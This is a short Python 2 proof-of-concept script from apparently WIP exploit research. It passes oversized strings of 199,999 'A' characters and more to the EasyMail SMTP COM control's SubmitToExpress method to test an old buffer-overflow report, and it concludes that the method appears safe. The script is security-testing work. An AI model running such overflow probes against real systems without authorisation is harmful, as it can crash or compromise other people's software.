# https://joeyrideout.com/reworking-decade-old-exploit-code/ # Python 2.7.15 32-bit PoC of https://www.exploit-db.com/exploits/10007/. # WIP # First, register DLL with Windows regsvr32 (for the brave! Use a VM.) # Admin CMD:> regsvr32 .\emsmtp.dll # (After, unregister with regsvr32 -u .\emsmtp.dll) # Then set up python: # Install 32-bit (x86): https://www.python.org/ftp/python/2.7.15/python-2.7.15.msi # Then: pip install pywin32 import win32com.client emlib = win32com.client.Dispatch("EasyMail.SMTP") # Exploit calls for >99999 chars passed to SubmitToExpress method aaa = "A"*199999 assert(10 == emlib.SubmitToExpress(aaa)) # Returns INT(10) if safe? (no crash) assert(10 == emlib.SubmitToExpress(aaa*100)) # Why not more? print "Done. EasyMail SMTP SubmitToExpress appears to be safe."